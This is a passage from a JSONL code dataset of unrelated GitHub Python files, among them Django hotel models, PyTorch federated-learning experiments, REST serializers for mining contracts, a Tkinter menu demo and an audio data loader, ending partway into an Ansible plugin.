{ 'airport': 'Airport Trans',\n\t\t\t\t 'earlyin' : 'Early Check In',\n\t\t\t\t 'lateout' : 'Late Check Out',\n\t\t\t\t 'connect' : 'Connecting Room',\n\t\t\t\t 'dailymaid': 'Daily Maid Service',\n\t\t\t\t 'extrabed': 'Extra Bed'}\n\n\t\texclude = ['rsvn']\n#=========================================================\nclass Tour (models.Model):\n\tagent\t\t\t= \tmodels.ForeignKey(Agent)\n\trsvn\t\t\t= \tmodels.ForeignKey(Rsvn)\n\tarrive_flight\t= \tmodels.CharField(max_length=30, blank=True)\n\tarrive_time\t\t=\tmodels.DateTimeField()\n\tdepart_flight\t= \tmodels.CharField(max_length=30, blank=True)\n\tdepart_time\t\t=\tmodels.DateTimeField()\n\tpromo\t\t\t=\tmodels.TextField(blank=True)\n\n\tdef __unicode__(self) :\n\t\treturn \" {} - {}\".format(self.agent,self.arrive_time)\n#--------------------------------------------------------------------\nclass TourForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Tour\n\t\tfields = '__all__'\n\t\texclude = ['rsvn']\n\t\twidgets = {\n\t\t\t'arrive_time' :TextInput (attrs={'class':'datetimepicker'}),\n\t\t\t'depart_time' :TextInput (attrs={'class':'datetimepicker'}),\n\t\t\t'promo' :Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#=========================================================\nclass Scheme (models.Model):\n\trsvn\t\t= \tmodels.ForeignKey(Rsvn)\n\tgridColor \t= \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\trsvnColor = \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\textraColor\t= \tmodels.CharField(max_length=15,choices=COLORLIST,default='white')\n\tdef __unicode__(self):\n\t\tgC = \"{} - {} {} {}\".format(self.rsvn.firstname, self.gridColor, self.rsvnColor, self.extraColor )\n\t\treturn(gC)\n#--------------------------------------------------------------------\nclass SchemeForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Scheme\n\t\tfields = '__all__'\n\t\texclude = ['rsvn']\n\n#=========================================================\nclass RoomInfo (models.Model):\n\tnumber\t\t=\tmodels.CharField(max_length=5)\n\ttype\t\t=\tmodels.CharField(max_length=25, choices=ROOM_TYPE_CHOICES)\n\tbeds\t\t=\tmodels.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\tconnect\t \t= models.CharField(max_length=5, blank=True)\n\tnotes\t\t=\tmodels.TextField(blank=True)\n\tcurrent\t\t=\tmodels.IntegerField(default=0)\n\n\tdef __unicode__(self):\n\t\tfullname = \"Room %s - %s - %s Beds\" % (self.number, self.type,self.beds )\n\t\treturn(fullname)\n#---------------------------------------------------------\nclass RoomInfoAdmin(admin.ModelAdmin) :\n\tlist_display = ('type', 'number', 'beds','connect', 'notes')\n\tordering = ('type','number')\n\n#=========================================================\nclass Room (models.Model):\n\trsvn\t\t= models.ForeignKey(Rsvn)\n\troominfo \t=\t models.ForeignKey(RoomInfo)\n\tinfo\t\t= \t models.CharField(max_length=512, blank=True)\n\troomstatus\t=\t models.CharField(max_length=13, choices=ROOM_STATUS,blank=True)\n\n\tdef __unicode__(self):\n\t\tfullname = \"%s %s\" % (self.rsvn,self.roominfo )\n\t\treturn(fullname)\n#---------------------------------------------------------\nclass RoomForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Room\n#=========================================================\nclass EventCalendar(models.Model) :\n\n\ttitle\t\t= models.CharField(max_length=128)\n\tpax\t\t\t= models.IntegerField(validators = [ MinValueValidator(1) ])\n\tevent\t\t= models.TextField(blank=True)\n\tdate\t\t= models.DateField(default=datetime.now().date().isoformat() )\n\tclerk\t\t= models.CharField(max_length=40)\n\tconfirm\t\t= models.CharField(max_length=20, blank=True)\n#=========================================================\nclass Event(models.Model) :\n\n\ttitle\t\t= models.CharField(max_length=128)\n\tpax\t\t\t= models.IntegerField(validators = [ MinValueValidator(1) ])\n\tdescr\t\t= models.TextField(blank=True)\n\tvenue \t\t= models.CharField(max_length=90,choices=VENUE_CHOICES)\n\tdateStart\t= models.DateTimeField( )\n\tdateEnd \t= models.DateTimeField( )\n\tclerk\t\t= models.CharField(max_length=40)\n\n#---------------------------------------------------------\nclass EventForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Event\n\t\texclude = ['clerk','confirm']\n\t\twidgets = {\n\t\t\t'event'\t\t:Textarea\t(attrs={'cols': 30, 'rows': 10, 'class' : 'leftjust' }),\n\t\t\t'dateStart'\t\t:TextInput \t(attrs={'class':'datetimepicker'}),\n\t\t\t'dateEnd'\t\t:TextInput \t(attrs={'class':'datetimepicker'}),\n\n\t\t\t}\n\n#---------------------------------------------------------\nclass Chat(models.Model) :\n\tclerk\t\t= models.CharField(max_length=40)\n\ttime\t\t= models.DateTimeField( )\n\ttitle\t\t= models.CharField(max_length=128)\n\tsubject\t\t= models.CharField(max_length=256)\n\titem\t\t= models.TextField()\n#---------------------------------------------------------\nclass ChatForm(ModelForm) :\n\tclass Meta :\n\t\tmodel = Chat\n\t\texclude = ['date']\n\n#---------------------------------------------------------\n\n\n\n\n\n\n","repo_name":"hoboland21/mango","sub_path":"archive/newmodels.py","file_name":"newmodels.py","file_ext":"py","file_size_in_byte":10800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71360535209","text":"#!/usr/bin/env python\nimport os\nimport time\nimport random\n\nimport ray\nimport torch\n\nfrom ray_parameter_server.async_parameter_server import AsyncParameterServer\nfrom ray_parameter_server.sync_parameter_server import SyncParameterServer\n\nMIN_FREQ = int(os.environ['SUSML_MIN_FREQ'])\nRAND_SEED = int(os.environ['SUSML_RAND_SEED'])\nNUM_EPOCHS = int(os.environ['SUSML_NUM_EPOCHS'])\nBATCH_SIZE = int(os.environ['SUSML_BATCH_SIZE'])\nLR = float(os.environ['SUSML_LR'])\nPARALLELISM_LEVEL = int(os.environ['SUSML_PARALLELISM_LEVEL'])\nRAY_PARAMETER_SERVER_STRATEGY = os.environ['RAY_PARAMETER_SERVER_STRATEGY']\n\nrandom.seed(RAND_SEED)\ntorch.manual_seed(RAND_SEED)\ntorch.backends.cudnn.deterministic = True\n\n\ndef start():\n ray.init(\n # address='192.168.178.51:6379',\n address='auto',\n ignore_reinit_error=True,\n webui_host='0.0.0.0',\n redis_password='5241590000000000'\n )\n try:\n if RAY_PARAMETER_SERVER_STRATEGY == 'sync':\n parameter_server = SyncParameterServer.remote()\n elif RAY_PARAMETER_SERVER_STRATEGY == 'async':\n parameter_server = AsyncParameterServer.remote()\n else:\n raise Exception('Environment variable \"RAY_PARAMETER_SERVER_STRATEGY\" must be set in ./src/env.sh to either \"sync\" or \"async\" to use one of the parameter server architectures.')\n print(ray.get(parameter_server.run.remote()))\n except Exception as e:\n raise e\n finally:\n print('Waiting 10s to allow logs to flush')\n time.sleep(10)\n ray.shutdown()\n\n\nif __name__ == \"__main__\":\n start()\n","repo_name":"jakob-ed/pytorch-dist-pos-tagger","sub_path":"src/start_ray.py","file_name":"start_ray.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29500728355","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom visualization.plots import plot_results, plot_multiple, plot_train_val\nimport os\nfrom logs.experiment_logs import save_data\nfrom logs.training_logs import log\nimport datetime\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef copy_model(main, n_clients, fmod):\n\n # copying main model weights and saving to temporary files to load at next training epoch\n # main: main(centralized) model\n # n_clients: number of clients(nodes)\n # fmod: folder for temporary models\n\n for i in range(n_clients):\n name1 = fmod + 'federated_model_weights_' + str(i)\n torch.save(main.state_dict(), name1)\n \"\"\"\n #averaging optimizer parameters\n name1 = fmod + 'federated_model_opt_' + str(i)\n torch.save(opt.state_dict(), name1)\n \"\"\"\n\n\ndef get_loaders(n, main_ds, batch_size):\n # doing random split of dataset at N equal sized loaders to emulate clients\n # n: number of clients\n # main_ds: dataset to split\n # batch_size: batch size of each client data loader\n split = int(len(main_ds) / n)\n loaders = list()\n splits = [split for i in range(n)]\n splits[-1] = len(main_ds) - split * (len(splits) - 1)\n print('split_sizes: ', splits)\n datasets = torch.utils.data.random_split(main_ds, splits)\n for dataset in datasets:\n dl = torch.utils.data.DataLoader(dataset=dataset,\n pin_memory=True,\n batch_size=batch_size,\n shuffle=True)\n loaders.append(dl)\n return loaders\n\n\ndef fix_arch(model, num_classes):\n # fixing FC layer of ResNet to predict required number of classes\n # num_classes: number of classes to fix architecture\n if str(type(model)) == '':\n # model.conv1 = torch.nn.Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n model.fc = torch.nn.Linear(2048, num_classes)\n return\n\n\ndef fit_epoch(model, optimizer, criterion, train_dl, fn):\n # training 1 epoch of given model and returning metrics\n # fn: folder name to save all logs\n model.train()\n log('Fitting epoch', fn)\n running_loss = 0\n running_acc = 0\n total = len(train_dl.dataset)\n cumulative = 0\n for i, (images, labels) in enumerate(train_dl):\n cumulative += len(labels)\n images = images.to(device)\n labels = labels.to(device)\n # Forward pass\n outputs = model(images)\n loss = criterion(outputs, labels)\n running_loss += loss.item()\n running_acc += (outputs.argmax(dim=1) == labels).float().cpu().sum()\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n log('Train loss: {:.3f}, Train acc: {:.3f}'.format(running_loss / cumulative,\n running_acc / cumulative * 100.),\n fn)\n log('Train loss: {:.3f}, Train acc: {:.3f}'.format(running_loss / total, running_acc / total * 100.), fn)\n return running_loss / total, running_acc / total * 100.\n\n\ndef save_client(client, opt, i, fmod):\n # saving client training information to interrupt training for aggregation\n # i: index number of client\n # fmod: folder to save weights\n name1 = fmod + 'federated_model_weights_' + str(i)\n name2 = fmod + 'federated_model_opt_' + str(i)\n torch.save(client.state_dict(), name1)\n torch.save(opt.state_dict(), name2)\n del client\n del opt\n\n\ndef load_client(i, arch, lr, fmod, num_classes):\n # loading client model and optimizer to continue training\n # fmod: folder to load weights\n # num_classes: number of classes to fix architecture\n model = arch()\n fix_arch(model, num_classes)\n name1 = fmod + 'federated_model_weights_' + str(i)\n name2 = fmod + 'federated_model_opt_' + str(i)\n model.load_state_dict(torch.load(name1))\n model = model.to(device)\n opt = torch.optim.Adam(model.parameters(), lr=lr)\n opt.load_state_dict(torch.load(name2))\n return model, opt\n\n\ndef validation(model, criterion, val_dl):\n # validating on given loader 1 epoch on given model and returning metrics\n model.eval()\n correct = 0.\n loss = 0.\n cumulative = 0\n with torch.no_grad():\n for i, (images, labels) in enumerate(val_dl):\n cumulative += len(labels)\n images = images.to(device)\n labels = labels.to(device)\n outputs = model(images)\n loss += criterion(outputs, labels).item()\n correct += (outputs.argmax(dim=1) == labels).float().sum()\n if i % 100 == 0:\n print('loss: {:.3f}, Acc: {:.3f}'.format(loss / cumulative, correct / cumulative * 100.))\n\n # model.train()\n return correct / float(len(val_dl.dataset)) * 100., loss / float(len(val_dl.dataset))\n\n\ndef aggregation(main_model, n_clients, arch, lr, fmod, num_classes):\n # simple weights averaging aggregation\n\n # client_models = list()\n # client_models = [load_client(i,arch,lr,fmod,num_classes) for i in range(n_clients)]\n # global m1\n for name in main_model.state_dict():\n param = main_model.state_dict()[name]\n tmp = torch.zeros(param.shape, dtype=torch.float).to(device)\n fl = True\n for j in range(n_clients):\n model, opt = load_client(j, arch, lr, fmod, num_classes)\n tmp += model.state_dict()[name].data.float()\n param.data.copy_(tmp * (1. / n_clients))\n copy_model(main_model, n_clients, fmod)\n\n\n\"\"\"\n if (j == 0) and fl:\n m1 = opt\n print(\"copied successfully\")\n else:\n for i in opt.state_dict()['state']:\n m1.state_dict()['state'][i]['exp_avg'].data += opt.state_dict()['state'][i]['exp_avg'].data\n m1.state_dict()['state'][i]['exp_avg_sq'].data += opt.state_dict()['state'][i]['exp_avg_sq'].data\n for i in m1.state_dict()['state']:\n m1.state_dict()['state'][i]['exp_avg'].data /= n_clients\n m1.state_dict()['state'][i]['exp_avg_sq'].data /= n_clients\n\n fl = False\n param.data.copy_(tmp * (1. / n_clients))\n\n copy_model(main_model, m1, n_clients, fmod)\n\n for name in main_opt.state_dict():\n param = main_opt.state_dict()[name]\n tmp = torch.zeros(param.shape, dtype=torch.float).to(device)\n for j in range(n_clients):\n tmp += client_models[j][1].state_dict()[name].data.float()\n param.data.copy_(tmp * (1. / n_clients))\n\"\"\"\n\n\n# copy_model(main_model, n_clients, fmod)\n\n\ndef federated(n_clients, arch, train_dataset, val_dl, fn, epoch_step=1, lr=1e-3, n_epochs=30, num_classes=2,\n batch_size=128, train_dl=None):\n \"\"\"\n\n :param n_clients: number of clients\n :param arch: model architecture\n :param train_dataset: PyTorch dataset\n :param val_dl: validation data loader\n :param fn: folder of experiment\n :param epoch_step: number of local epochs before averaging\n :param lr: learning rate\n :param n_epochs: total number of epochs\n :param num_classes: number of classes\n :param batch_size: batch size\n :param train_dl: train data loader\n :return: loss and accuracy metric of federated trained model\n \"\"\"\n\n fmod = fn + '/models/'\n fplot = fn + '/plots/'\n try:\n os.mkdir(fmod)\n except FileExistsError:\n pass\n main_model = arch(pretrained=True)\n fix_arch(main_model, num_classes)\n main_model = main_model.to(device)\n torch.save(main_model.state_dict(), 'initial_model')\n criterion = nn.CrossEntropyLoss()\n train_loaders = get_loaders(n_clients, train_dataset, batch_size=batch_size)\n client_models = [arch() for i in range(n_clients)]\n for i, model in enumerate(client_models):\n fix_arch(model, num_classes)\n optimizers = [torch.optim.Adam(client_models[i].parameters(), lr=lr) for i in range(n_clients)]\n\n for i in range(n_clients):\n save_client(client_models[i], optimizers[i], i, fmod)\n val_loss = list()\n val_acc = list()\n train_loss = list()\n train_acc = list()\n copy_model(main_model, n_clients, fmod)\n for epoch in range(n_epochs):\n losstr = 0.\n acctr = 0.\n for i in range(n_clients):\n client, opt = load_client(i, arch, lr, fmod, num_classes)\n loss, acc = fit_epoch(client, opt, criterion, train_loaders[i], fn)\n losstr += loss\n acctr += acc\n save_client(client, opt, i, fmod)\n losstr /= n_clients\n acctr /= n_clients\n if (epoch + 1) % epoch_step == 0:\n aggregation(main_model, n_clients, arch, lr, fmod, num_classes)\n acc, loss = validation(main_model, criterion, val_dl)\n # acctr, losstr = validation(main_model, criterion, train_dl)\n log('Epoch [{}/{}], ValLoss: {:.4f}, ValAccuracy: {:.3f}'\n .format(epoch + 1, n_epochs, loss, acc), fn)\n log('Epoch [{}/{}], TrainLoss: {:.4f}, TrainAccuracy: {:.3f}'\n .format(epoch + 1, n_epochs, losstr, acctr), fn)\n val_loss.append(loss)\n val_acc.append(acc)\n train_loss.append(losstr)\n train_acc.append(acctr)\n else:\n log('Epoch [{}/{}]'.format(epoch + 1, n_epochs), fn)\n plot_train_val(fplot + 'federated_training.png', train_acc, val_acc, train_loss, val_loss)\n val_loss = val_loss\n val_acc = val_acc\n return val_loss, val_acc, main_model\n\n\ndef single(arch, train_dl, val_dl, fn, lr=1e-3, epoch_step=1, n_epochs=30, num_classes=2):\n\n \"\"\"\n Training model with same architecture as clients but using whole training dataset\n :param arch: model architecture\n :param train_dl: train data loader\n :param val_dl: validation data loader\n :param fn: folder of experiment\n :param lr: learning rate\n :param epoch_step: number of local epochs before validation\n :param n_epochs: total number of epochs\n :param num_classes: number of classes\n :return: loss and accuracy\n \"\"\"\n fplot = fn + '/plots/'\n model = arch(pretrained=True)\n fix_arch(model, 2)\n\n #model.load_state_dict(torch.load('unlabeled_model'))\n model.load_state_dict(torch.load('initial_model'))\n fix_arch(model, num_classes)\n model = model.to(device)\n # torch.save(model.state_dict(), 'initial_model_unlabeled')\n opt = torch.optim.Adam(model.parameters(), lr=lr)\n criterion = nn.CrossEntropyLoss()\n val_loss = list()\n val_acc = list()\n train_loss = list()\n train_acc = list()\n for epoch in range(n_epochs):\n losstr, acctr = fit_epoch(model, opt, criterion, train_dl, fn)\n if (epoch + 1) % epoch_step == 0:\n acc, loss = validation(model, criterion, val_dl)\n val_loss.append(loss)\n val_acc.append(acc)\n train_loss.append(losstr)\n train_acc.append(acctr)\n log('Epoch [{}/{}], ValLoss: {:.4f}, ValAccuracy: {:.3f}'\n .format(epoch + 1, n_epochs, loss, acc), fn)\n else:\n log('Epoch [{}/{}]'.format(epoch + 1, n_epochs), fn)\n plot_train_val(fplot + 'single_training.png', train_acc, val_acc, train_loss, val_loss)\n return val_loss, val_acc, model\n\n\ndef experiment(arch, train_dataset, validation_dataset, n_epochs=30, n_clients=10, n_experiments=10,\n learning_rate=1e-3,\n batch_size=128,\n epoch_step=1,\n prefix='1'):\n \"\"\"\n Performing series of experiments comparing federated and single model performance with same initial weights\n :param arch: model architecture\n :param train_dataset: train dataset\n :param validation_dataset: validation dataset\n :param n_epochs: total number of epochs\n :param n_clients: number of clients\n :param n_experiments: number of experiments\n :param learning_rate: learning rate\n :param batch_size: batch size\n :param epoch_step: number of local epochs before averaging\n :param prefix: prefix to add in folder name\n :return: void\n \"\"\"\n path = os.getcwd()\n # fn = path + '/experiments/' + prefix + '_nex' + str(n_experiments) + '_nep' + str(n_epochs) + '_nc' + str(\n # n_clients) + '_epst' + str(epoch_step)\n fn = path + '/experiments/' + str(datetime.datetime.now().date()) + '_' + str(\n datetime.datetime.now().time()) + '_' + prefix\n fplot = fn + '/plots'\n fn1 = fplot + '/average.png'\n fn2 = fplot + '/all.png'\n try:\n os.mkdir(fn)\n os.mkdir(fplot)\n except FileExistsError:\n pass\n train_dl = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n pin_memory=True,\n shuffle=True)\n val_dl = torch.utils.data.DataLoader(dataset=validation_dataset,\n batch_size=batch_size,\n pin_memory=True,\n shuffle=False)\n all_acc_s = list()\n all_loss_s = list()\n all_loss_f = list()\n all_acc_f = list()\n average_acc_f = np.zeros((n_epochs // epoch_step), dtype=float)\n average_loss_f = np.zeros((n_epochs // epoch_step), dtype=float)\n average_acc_s = np.zeros((n_epochs // epoch_step), dtype=float)\n average_loss_s = np.zeros((n_epochs // epoch_step), dtype=float)\n for i in range(n_experiments):\n log('Starting experiment [' + str(i + 1) + '/' + str(n_experiments) + ']', fn)\n log('Federated_model', fn)\n val_loss, val_acc, model_f = federated(n_clients, arch, train_dataset, val_dl, fn, lr=learning_rate,\n n_epochs=n_epochs,\n epoch_step=epoch_step,\n batch_size=batch_size,\n train_dl=train_dl)\n average_acc_f += np.array(val_acc, dtype=float)\n average_loss_f += np.array(val_loss, dtype=float)\n all_loss_f.append(val_loss)\n all_acc_f.append(val_acc)\n log('Single_model', fn)\n val_loss1, val_acc1, model_s = single(arch, train_dl, val_dl, fn, lr=learning_rate, n_epochs=n_epochs,\n epoch_step=epoch_step)\n all_loss_s.append(val_loss1)\n all_acc_s.append(val_acc1)\n average_acc_s += np.array(val_acc1, dtype=float)\n average_loss_s += np.array(val_loss1, dtype=float)\n torch.save(model_f.state_dict(), fn + '/federated_model_' + str(i))\n torch.save(model_s.state_dict(), fn + '/single_model_' + str(i))\n\n # plot_results(val_loss, val_acc, val_loss1, val_acc1, 'Experiment number ' + str(i + 1) + ':')\n\n average_acc_f *= (1. / n_experiments)\n average_loss_f *= (1. / n_experiments)\n average_acc_s *= (1. / n_experiments)\n average_loss_s *= (1. / n_experiments)\n\n save_data(arch, fn, epoch_step=epoch_step, n_epochs=n_epochs,\n n_clients=n_clients, n_experiments=n_experiments, learning_rate=learning_rate, batch_size=batch_size)\n plot_results(fn1, average_loss_f, average_acc_f, average_loss_s, average_acc_s,\n 'Average over all experiments ' + ':')\n plot_multiple(fn2, all_loss_s, all_loss_f, all_acc_s, all_acc_f, epoch_step=epoch_step, n_epochs=n_epochs,\n n_clients=n_clients, n_experiments=n_experiments, arch=str(arch), lr=learning_rate)\n\n return\n","repo_name":"MitrofanovEV/PyTorchFederated","sub_path":"federated.py","file_name":"federated.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31801584781","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\n\nfrom io import BytesIO\n\nimport main, json\n\n\nclass HTTPRequest(BaseHTTPRequestHandler):\n \n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length)\n expansion = main.queryExpansion(json.loads(body)['query'])\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(bytes(json.dumps({\"expansion\":expansion}), 'utf-8'))\n self.wfile.write(response.getvalue())\n\n\nhttpd = HTTPServer(('localhost', 8000), HTTPRequest)\nhttpd.serve_forever()\n","repo_name":"JermXT/synonymExpander","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71476686248","text":"from datetime import date\nfrom rest_framework import serializers, exceptions\nfrom src.application.models import Contract\nfrom src.application.api.v1.formulas import calculate_contract_price\n\nfrom src.application.db_commands import get_cryptocurrency_price_or_404\n\n\nclass GetContractPriceSerizalizer(serializers.ModelSerializer):\n contract_price = serializers.FloatField(read_only=True)\n hashrate = serializers.FloatField(write_only=True)\n contract_start = serializers.DateField(write_only=True)\n contract_end = serializers.DateField(write_only=True)\n\n class Meta:\n model = Contract\n\n fields = [\n 'hashrate',\n 'contract_start',\n 'contract_end',\n 'contract_price'\n ]\n\n def validate(self, attrs):\n contract_data = {\n 'hashrate': attrs.get('hashrate'),\n 'contract_start': attrs.get('contract_start'),\n 'contract_end': attrs.get('contract_end')\n }\n contract_price = calculate_contract_price(\n contract_data=contract_data\n )\n return {\n 'contract_price': contract_price\n }\n\n\nclass CreateContractSerizalizer(serializers.ModelSerializer):\n\n class Meta:\n model = Contract\n\n fields = [\n 'id',\n 'hashrate',\n 'contract_start',\n 'contract_end'\n ]\n\n def validate_contract_start(self, value):\n contract_start = value\n if contract_start < date.today():\n raise exceptions.ValidationError(\n detail='The contract start date cannot be in the past.'\n )\n return value\n\n def validate_contract_end(self, value):\n contract_end = value\n if contract_end < date.today():\n raise exceptions.ValidationError(\n detail='The contract end date cannot be in the past.'\n )\n return value\n\n def validate(self, attrs):\n validated_data = super().validate(attrs)\n contract_start = attrs.get('contract_start')\n contract_end = attrs.get('contract_end')\n\n if contract_start >= contract_end:\n raise exceptions.ValidationError(\n detail='The start date of the contract cannot be less than\\\n the end date of the contract.'\n )\n return validated_data\n\n\nclass GetAllContractsSerizalizer(serializers.ModelSerializer):\n\n class Meta:\n model = Contract\n\n fields = [\n 'id',\n 'hashrate',\n 'contract_start',\n 'contract_end',\n 'is_paid'\n ]\n\n\nclass ChangeLastContractPaymentStatusSerializer(serializers.ModelSerializer):\n\n user_id = serializers.CharField(write_only=True)\n count = serializers.FloatField(write_only=True)\n crypto_type = serializers.CharField(\n min_length=3, max_length=4, write_only=True)\n\n class Meta:\n model = Contract\n\n fields = [\n 'user_id',\n 'count',\n 'crypto_type'\n ]\n\n def validate(self, attrs):\n validated_data = super().validate(attrs)\n customer_id = attrs.get('user_id')\n count = attrs.get('count')\n crypto_type = attrs.get('crypto_type')\n contract = self.Meta.model.objects.filter(\n customer_id=customer_id, is_paid=False\n ).first()\n contract_data = {\n 'hashrate': contract.hashrate,\n 'contract_start': contract.contract_start,\n 'contract_end': contract.contract_end\n }\n contract_price = calculate_contract_price(contract_data)\n current_payment = get_cryptocurrency_price_or_404(\n crypto_type=crypto_type\n )\n usdt = current_payment.usdt if crypto_type != 'usdt'\\\n else current_payment\n current_payment_usdt = usdt * count\n print('PAYMENT', current_payment_usdt)\n print('CONTRACT', contract_price)\n if contract_price != current_payment_usdt:\n raise exceptions.ValidationError(\n detail={'count': 'Contract and payment amounts do not match.'},\n )\n return validated_data\n\n def update(self, instance, validated_data):\n instance.is_paid = True\n instance.save()\n return instance\n","repo_name":"EasyDev-co/CloudMiningWebsite","sub_path":"backend/src/application/api/v1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169630283","text":"from tkinter import *\r\nimport tkinter.messagebox as tmsg\r\n\r\npy_root=Tk()\r\npy_root.title(\"Tkinter\")\r\npy_root.geometry(\"455x366\")\r\n\r\ndef func():\r\n print(\"Heloo!! ......\")\r\n\r\ndef help():\r\n print(\"I will help you\")\r\n tmsg.showinfo(\"Help\", \"We will help you with this gui\")\r\n\r\ndef feedback():\r\n print(\"Give feedback\")\r\n value = tmsg.askquestion(\"Was your experience Good?\", \"You used this gui.. Was your experience Good?\")\r\n if value == \"yes\":\r\n msg = \"Great. Give the feedback on appstore please\"\r\n else:\r\n msg = \"Tell us what went wrong. We will call you soon\"\r\n tmsg.showinfo(\"Experience\", msg)\r\n\r\ndef project():\r\n ans = tmsg.askretrycancel(\"Do you like this project?\", \"Sorry i you do't like it\")\r\n if ans:\r\n print(\"Retry karne pe bhi kuch nahi hoga\")\r\n\r\n else:\r\n print(\"thank you\")\r\n\r\n# mymenu=Menu(py_root)\r\n# mymenu.add_command(label=\"File\",command=func)\r\n# mymenu.add_command(label=\"Exit\",command=quit)\r\n# py_root.config(menu=mymenu)\r\n\r\nmainmenu=Menu(py_root)\r\n\r\nm1=Menu(mainmenu,tearoff=0)\r\nm1.add_command(label=\"New\",command=func)\r\nm1.add_command(label=\"save\",command=func)\r\nm1.add_separator()\r\nm1.add_command(label=\"save as\",command=func)\r\nm1.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"FIle\",menu=m1)\r\n\r\nm2=Menu(mainmenu,tearoff=0)\r\nm2.add_command(label=\"New\",command=func)\r\nm2.add_command(label=\"save\",command=func)\r\nm2.add_separator()\r\nm2.add_command(label=\"save as\",command=func)\r\nm2.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"Edit\",menu=m2)\r\n\r\nm3=Menu(mainmenu,tearoff=0)\r\nm3.add_command(label=\"New\",command=func)\r\nm3.add_command(label=\"save\",command=func)\r\nm3.add_separator()\r\nm3.add_command(label=\"save as\",command=func)\r\nm3.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"View\",menu=m3)\r\n\r\nm4=Menu(mainmenu,tearoff=0)\r\nm4.add_command(label=\"Help\",command=help)\r\nm4.add_command(label=\"feedback\",command=feedback)\r\nm4.add_command(label=\"project\",command=project)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"Help\",menu=m4)\r\n\r\n\r\npy_root.mainloop()","repo_name":"Neer19/GUI-using-Tkinter","sub_path":"messagebox.py","file_name":"messagebox.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26954164467","text":"import torch\nimport torch.utils.data\nimport os\nimport numpy as np\nimport json\nimport pandas as pd\nfrom torch.utils.data import DataLoader\n\ndef get_data(filepath):\n dataset = pd.read_pickle(filepath)\n\n unique_id = list(range(len(dataset['name'])))\n dataset['unique_id'] = unique_id\n \n unique_id_col = 'unique_id'\n audio_feat_col = 'audio'\n label_col = 'label'\n\n dataset[audio_feat_col] = dataset[audio_feat_col]\n dataset[unique_id_col] = dataset[unique_id_col].to_numpy()\n dataset[label_col] = dataset[label_col].to_numpy()\n\n ids = list(dataset[unique_id_col])\n total_len = len(ids)\n np.random.shuffle(ids)\n\n # set parameters for DataLoader -- num_workers = cores, drop_last = uneven batching\n params = {'batch_size': 16,\n 'shuffle': True,\n 'num_workers': 0,\n 'drop_last': True\n }\n\n # create data generator\n _len = [x.shape[1] for x in dataset['audio']]\n _lab_len = [len(x) for x in dataset['label']]\n\n padded_data = []\n padded_label = []\n\n for val in dataset['audio']:\n if val.shape[1] < max(_len):\n val = np.pad(val, ((0,0), (0, max(_len)-len(val[1]))))\n padded_data.append(val)\n\n for lab in dataset['label']:\n if len(lab) < max(_lab_len):\n lab = np.array(np.pad(lab, ((0, max(_lab_len)-len(lab)))))\n padded_label.append(lab)\n\n\n dataset['padded_audio'] = padded_data\n dataset['padded_label'] = padded_label\n\n labels = {}\n\n for i in dataset[unique_id_col]:\n labels[i] = dataset['padded_label'][i]\n\n data_set = AudioDataset(data=dataset, labels=labels, list_IDs=ids, in_len=_len, targ_len=_lab_len)\n data_generator = DataLoader(data_set, **params)\n return max(_len), data_generator\n\nclass AudioDataset(torch.utils.data.Dataset):\n\n def __init__(self, data, list_IDs: list, labels: dict, in_len, targ_len):\n \"\"\"Create custom torch Dataset. \"\"\"\n\n self.data = data\n self.labels = labels\n self.list_IDs = list_IDs\n self.label_lengths = targ_len\n self.input_lengths = in_len\n\n def __len__(self):\n return len(self.list_IDs)\n\n def __getitem__(self, index):\n # select sample\n ID = self.list_IDs[index]\n original_len = self.input_lengths[index]\n original_label_len = self.label_lengths[index]\n\n # Load data \n X = self.data[self.data['unique_id'] == ID]['padded_audio'].values[0]\n y = self.labels[ID]\n\n return original_len, original_label_len, self.list_IDs, torch.from_numpy(X), torch.tensor(y) \n","repo_name":"cshaib/CTC_based_kws","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16998810676","text":"from __future__ import (absolute_import, division, print_function)\n\n__metaclass__ = type\n\nfrom ansible.errors import AnsibleError\nfrom ansible.plugins.action import ActionBase\nfrom ansible.utils.vars import merge_hash\n\nimport os\n\n\nclass 